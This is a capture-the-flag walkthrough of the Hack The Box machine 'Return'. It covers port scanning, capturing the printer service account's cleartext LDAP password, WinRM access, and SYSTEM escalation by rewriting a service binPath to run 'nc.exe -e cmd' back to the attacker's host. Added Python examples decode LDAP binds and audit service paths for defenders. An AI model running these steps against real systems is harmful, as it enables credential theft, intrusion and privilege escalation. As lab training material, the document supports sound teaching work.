We start with basic Nmap reconnaissance: a scan for open TCP ports, followed by default scripts and version detection run against the open ports.
//
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-26 15:22 EDT
Nmap scan report for 10.10.11.108
Host is up (0.18s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.11.108
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
88/tcp open kerberos-sec?
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-26T19:54:32
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
We enumerate the SMB protocol to list shared resources.
We can see the target is a printer; now let's look at what is running on port 80 (Nmap reported the title "HTB Printer Admin Panel").
We start a listener on the LDAP port (389) and wait for the target to connect to us:
//
nc -nlvp 389
listening on [any] 389 ...
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57513
0*`%return\svc-printer�
1edFg43012!!
We obtain credentials. Now we can try them against SMB or WinRM, since both are open.
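What the listener received, decoded as an added example (not part of the original write-up): the odd characters nc printed (`0*`, `` `% ``, the stray glyph before the password) are the BER tags and lengths of an LDAPv3 BindRequest, and the tag 0x80 in front of the password means simple authentication, so the password travels in clear on plain 389/tcp to whatever host is configured as the LDAP server. The byte string below is constructed to match that capture; the decoder reports the password's length rather than the password itself.

```python
"""Decode an LDAPv3 BindRequest (RFC 4511) from raw bytes.

Added example, not part of the original write-up: it explains what the
netcat listener on port 389 actually received. CAPTURED_BIND is constructed
to match the bytes nc printed; nothing here touches the network.
"""

# Constructed sample: the BindRequest the target sent to the listener.
CAPTURED_BIND = (
    b"\x30\x2a"                           # LDAPMessage SEQUENCE, 42 bytes follow ("0*" in nc output)
    b"\x02\x01\x01"                       # messageID INTEGER = 1
    b"\x60\x25"                           # [APPLICATION 0] BindRequest, 37 bytes ("`%" in nc output)
    b"\x02\x01\x03"                       # version INTEGER = 3
    b"\x04\x12" b"return\\svc-printer"    # name OCTET STRING, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"           # authentication [0] simple, 12 bytes (0x80 is the stray glyph)
)

TAG_SEQUENCE = 0x30
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE = 0x80    # [0] context-specific, primitive: cleartext password
TAG_AUTH_SASL = 0xA3      # [3] context-specific, constructed: SASL mechanism + credentials


def read_tlv(buf: bytes, pos: int):
    """Read one BER element at buf[pos]; return (tag, value, position after it).
    Supports short- and long-form definite lengths, which is all LDAP uses."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER header")
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("unsupported or truncated BER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER value")
    return tag, value, pos + length


def expect(tag_seen: int, tag_wanted: int, what: str) -> None:
    if tag_seen != tag_wanted:
        raise ValueError(f"expected {what} (tag 0x{tag_wanted:02x}), got 0x{tag_seen:02x}")


def decode_bind_request(msg: bytes) -> dict:
    """Return the fields of a BindRequest. For a simple bind only the password
    length is returned, so the result is safe to write to a log."""
    tag, body, _ = read_tlv(msg, 0)
    expect(tag, TAG_SEQUENCE, "LDAPMessage")
    tag, mid, pos = read_tlv(body, 0)
    expect(tag, TAG_INTEGER, "messageID")
    tag, op, _ = read_tlv(body, pos)
    expect(tag, TAG_BIND_REQUEST, "BindRequest")
    tag, ver, pos = read_tlv(op, 0)
    expect(tag, TAG_INTEGER, "version")
    tag, name, pos = read_tlv(op, pos)
    expect(tag, TAG_OCTET_STRING, "name")
    tag, auth, _ = read_tlv(op, pos)
    result = {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode("utf-8", errors="replace"),
    }
    if tag == TAG_AUTH_SIMPLE:
        result["auth"] = "simple"
        result["password_length"] = len(auth)   # the password itself is right there in clear
    elif tag == TAG_AUTH_SASL:
        mech_tag, mech, _ = read_tlv(auth, 0)
        expect(mech_tag, TAG_OCTET_STRING, "SASL mechanism")
        result["auth"] = "sasl"
        result["mechanism"] = mech.decode("ascii", errors="replace")
    else:
        result["auth"] = f"unknown(0x{tag:02x})"
    return result


def is_cleartext_bind(msg: bytes) -> bool:
    """True when the message is a simple bind carrying a non-empty password,
    i.e. a credential readable by any host that receives the connection."""
    info = decode_bind_request(msg)
    return info["auth"] == "simple" and info.get("password_length", 0) > 0


if __name__ == "__main__":
    print(decode_bind_request(CAPTURED_BIND))
    print("cleartext credential on the wire:", is_cleartext_bind(CAPTURED_BIND))
```

The defensive lesson is in the tag byte: a device that authenticates with a simple bind over plain LDAP hands its credential to whatever address is entered as the LDAP server, so the panel's server setting is effectively a credential-disclosure button. Mitigations are LDAPS or a SASL mechanism (the decoder distinguishes the two), and a dedicated account for the device with no rights beyond directory lookups; the `net user` output later in this write-up shows why the second point matters here.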
//
We check whether the credentials are valid:
❯ netexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB 10.10.11.108 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\svc-printer:1edFg43012!!
We try WinRM to see whether remote command execution on the Windows host is possible:
❯ netexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
WINRM 10.10.11.108 5985 PRINTER [*] Windows 10 / Server 2019 Build 17763 (name:PRINTER) (domain:return.local)
WINRM 10.10.11.108 5985 PRINTER [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)
WinRM reports Pwn3d!, so we will use it to gain access.
//
We use evil-winrm with the credentials:
evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.7
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
We look for the flag:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-printer> cd Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> dir
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/26/2025 12:34 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> type user.txt
a36b7a37aef598d3808d8ae5f0b1840b
Now we go to Users to see whether we can escalate privileges.
//
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cd C:\users
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/27/2021 4:40 AM Administrator
d-r--- 5/26/2021 1:50 AM Public
d----- 5/26/2021 1:51 AM svc-printer
*Evil-WinRM* PS C:\users> cd Administrator
*Evil-WinRM* PS C:\users\Administrator> dir
Directory: C:\users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 5/20/2021 12:10 PM 3D Objects
d-r--- 5/20/2021 12:10 PM Contacts
d-r--- 9/27/2021 4:22 AM Desktop
d-r--- 5/27/2021 12:50 AM Documents
d-r--- 5/26/2021 3:00 AM Downloads
d-r--- 5/20/2021 12:10 PM Favorites
d-r--- 5/20/2021 12:10 PM Links
d-r--- 5/20/2021 12:10 PM Music
d-r--- 5/20/2021 12:10 PM Pictures
d-r--- 5/20/2021 12:10 PM Saved Games
d-r--- 5/20/2021 12:10 PM Searches
d-r--- 5/20/2021 12:10 PM Videos
*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/26/2025 12:34 PM 34 root.txt
I can see the flag's TXT file, but it won't let me open it because I don't have the privileges, so we have to gain full access to the system.
*Evil-WinRM* PS C:\users\Administrator\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\users\Administrator\Desktop> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 4/26/2025 1:15:54 PM
Logon hours allowed All
Local Group Memberships
*Print Operators
*Remote Management Use
*Server Operators
*Global Group memberships
*Domain Users
*The command completed successfully.
Server Operators appears among our group memberships, which lets us stop and start services and therefore escalate privileges, so we will try to obtain a reverse shell through a service.
To do this we locate our copy of nc.exe, place it on the victim machine and note its absolute path, disguising it as a service binary.
With nc.exe on the victim system we reconfigure an existing service so that it launches a reverse shell, start our listener, and then stop and start the service to establish the reverse shell.
//
We modify the VMTools service with sc.exe so that when it runs it gives us a reverse shell back to our machine:
*Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config VMTools binPath="C:\users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.38 443"
[SC] ChangeServiceConfig SUCCESS
nc -lvnp 443
listening on [any] 443 ...
*Evil-WinRM* PS sc.exe stop VMTools
*Evil-WinRM* PS sc.exe start VMTools
nc -lvnp 443
connect to [10.10.14.38] from (UNKNOWN) [10.10.11.108] 57790
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
25a951805c15e0757260f46fb959f4f9
We reached root and obtained the flag, which completes this machine.
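A defender's counterpart to the service step above, as an added example that is not part of the original write-up: a baseline comparison of service binPath values (which is what `sc.exe config ... binPath=` changes), checks for service binaries that live outside trusted directories or inside user-writable ones or have an unquoted path with spaces, and a review of which accounts sit in Server Operators or Print Operators. The service records, the account list and the pre-change VMTools path are constructed sample data (the write-up never shows the original VMTools path); the post-change binPath is the one from the sc.exe command.

```python
"""Audit Windows service configuration for the binPath abuse shown above.

Added example, not part of the original write-up. All records below are
constructed samples of the kind Get-CimInstance Win32_Service (Name, PathName,
StartName) and `net user` would return, so the script runs offline.
"""
import re
from pathlib import PureWindowsPath

# Where a service binary is expected to live (assumption: default install drive C:).
TRUSTED_ROOTS = (r"C:\Windows", r"C:\Program Files", r"C:\Program Files (x86)")
# Where a non-admin user can write; a service binary here is a red flag.
USER_WRITABLE_ROOTS = (r"C:\Users", r"C:\Temp")
# Built-in groups whose members can reconfigure and restart services on a DC.
SERVICE_CONTROL_GROUPS = ("Server Operators", "Print Operators")

# Constructed snapshots: before and after the sc.exe config command in the write-up.
# The baseline VMTools path is a placeholder; the write-up does not show the real one.
BASELINE_SERVICES = [
    {"name": "VMTools", "binpath": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"', "start_name": "LocalSystem"},
    {"name": "Spooler", "binpath": r"C:\Windows\System32\spoolsv.exe", "start_name": "LocalSystem"},
    {"name": "Updater", "binpath": r"C:\Program Files\Some Vendor\updater.exe", "start_name": "LocalSystem"},
]
CURRENT_SERVICES = [
    {"name": "VMTools", "binpath": r"C:\users\svc-printer\Desktop\nc.exe -e cmd 10.10.14.38 443", "start_name": "LocalSystem"},
    {"name": "Spooler", "binpath": r"C:\Windows\System32\spoolsv.exe", "start_name": "LocalSystem"},
    {"name": "Updater", "binpath": r"C:\Program Files\Some Vendor\updater.exe", "start_name": "LocalSystem"},
]
# Constructed: svc-printer's groups are the ones `net user` listed; jdoe is a made-up control case.
GROUP_MEMBERSHIPS = {
    "svc-printer": ["Print Operators", "Remote Management Users", "Server Operators"],
    "jdoe": ["Domain Users"],
}


def executable_from_binpath(binpath: str) -> str:
    """Extract the executable the Service Control Manager launches from a binPath string."""
    s = binpath.strip()
    if s.startswith('"'):                       # quoted path: everything up to the closing quote
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    m = re.match(r"(.*?\.exe)(?=\s|$)", s, re.IGNORECASE)   # unquoted: up to the first .exe token
    return m.group(1) if m else s.split()[0]


def is_under(path: str, root: str) -> bool:
    """Case-insensitive 'path lies below root' test on Windows path components."""
    p, r = PureWindowsPath(path.lower()).parts, PureWindowsPath(root.lower()).parts
    return p[:len(r)] == r


def audit_service(svc: dict) -> list:
    """Return human-readable findings for one service record (empty list = clean)."""
    exe = executable_from_binpath(svc["binpath"])
    findings = []
    if not any(is_under(exe, r) for r in TRUSTED_ROOTS):
        findings.append(f"{svc['name']}: binary outside trusted roots ({exe}), runs as {svc['start_name']}")
    if any(is_under(exe, r) for r in USER_WRITABLE_ROOTS):
        findings.append(f"{svc['name']}: binary in a user-writable location ({exe})")
    if not svc["binpath"].strip().startswith('"') and " " in exe:
        findings.append(f"{svc['name']}: unquoted service path containing spaces ({exe})")
    return findings


def diff_binpaths(baseline: list, current: list) -> dict:
    """Map service name -> (old, new) for every binPath that differs from the baseline."""
    before = {s["name"]: s["binpath"] for s in baseline}
    return {s["name"]: (before.get(s["name"]), s["binpath"])
            for s in current if before.get(s["name"]) != s["binpath"]}


def risky_group_members(memberships: dict) -> dict:
    """Map account -> the service-control groups it belongs to; clean accounts are omitted."""
    out = {}
    for account, groups in memberships.items():
        hits = [g for g in groups if g in SERVICE_CONTROL_GROUPS]
        if hits:
            out[account] = hits
    return out


if __name__ == "__main__":
    for name, (old, new) in diff_binpaths(BASELINE_SERVICES, CURRENT_SERVICES).items():
        print(f"binPath changed: {name}: {old!r} -> {new!r}")
    for svc in CURRENT_SERVICES:
        for finding in audit_service(svc):
            print("finding:", finding)
    for account, groups in risky_group_members(GROUP_MEMBERSHIPS).items():
        print(f"review membership: {account} in {', '.join(groups)}")
```

Run it as-is to see the three checks fire on the constructed data; on a real host, feed it the output of `Get-CimInstance Win32_Service` (the Name, PathName and StartName properties) and `net user`. The baseline diff is the check that catches this specific technique, since `sc.exe config` leaves the service name and start account untouched and only rewrites the image path; the group review addresses the root cause, a printer service account that was placed in Server Operators.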